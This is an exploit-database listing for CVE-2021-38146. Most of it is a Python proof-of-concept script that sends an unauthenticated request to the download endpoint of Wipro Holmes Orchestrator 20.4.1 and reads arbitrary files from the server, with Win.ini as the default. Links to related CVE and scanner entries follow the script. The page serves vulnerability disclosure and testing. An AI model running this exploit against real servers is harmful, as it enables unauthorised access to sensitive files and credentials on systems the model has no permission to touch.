Lucene search
Rizal Muhammed1337DAY-ID-37046HistoryNov 15, 2021 - 12:00 a.m.
Wipro Holmes Orchestrator 20.4.1 Arbitrary File Download Exploit
2021-11-1500:00:00
Rizal Muhammed
0day.today
246
0.123 Low
EPSS
Percentile
95.4%
# Exploit Title: Wipro Holmes Orchestrator 20.4.1 Unauthenticated Arbitrary File Read PoC
# Exploit Author: Rizal Muhammed @ub3rsick
# Vendor Homepage: https://www.wipro.com/holmes/
# Version: 20.4.1
# Tested on: Windows 10 x64
# CVE : CVE-2021-38146
import requests as rq
import argparse
port = 8001 # change port if application is running on different port
def file_download(host, filepath):
vuln_url = "http://%s:%s/home/download" % (host, port)
data = {
"SearchString": filepath,
"Msg": ""
}
hdr = {
"content-type": "application/json"
}
resp = rq.post(vuln_url, headers=hdr, json=data)
print resp.text
def main():
parser = argparse.ArgumentParser(
description="CVE-2021-38146 - Wipro Holmes Orchestrator 20.4.1 Unauthenticated Arbitrary File Download",
epilog="Vulnerability Discovery and PoC Author - Rizal Muhammed @ub3rsick"
)
parser.add_argument("-t","--target-ip", help="IP Address of the target server", required=True)
parser.add_argument("-f","--file-path", help="Absolute Path of the file to download", default="C:/Windows/Win.ini")
args = parser.parse_args()
if "\\" in args.file_path:
fp = args.file_path.replace("\\", "/")
else:
fp = args.file_path
file_download(args.target_ip, fp)
if __name__ == "__main__":
main()
Related
cve
cve
CVE-2021-38146
2021-11-22 09:15:07
cvelist
cvelist
CVE-2021-38146
2021-11-22 08:34:58
nuclei
nuclei
Wipro Holmes Orchestrator 20.4.1 - Arbitrary File Download
2024-06-07 14:11:41
packetstorm
packetstorm
Wipro Holmes Orchestrator 20.4.1 Arbitrary File Download
2021-11-15 00:00:00
nvd
nvd
CVE-2021-38146
2021-11-22 09:15:07
prion
prion
Path traversal
2021-11-22 09:15:00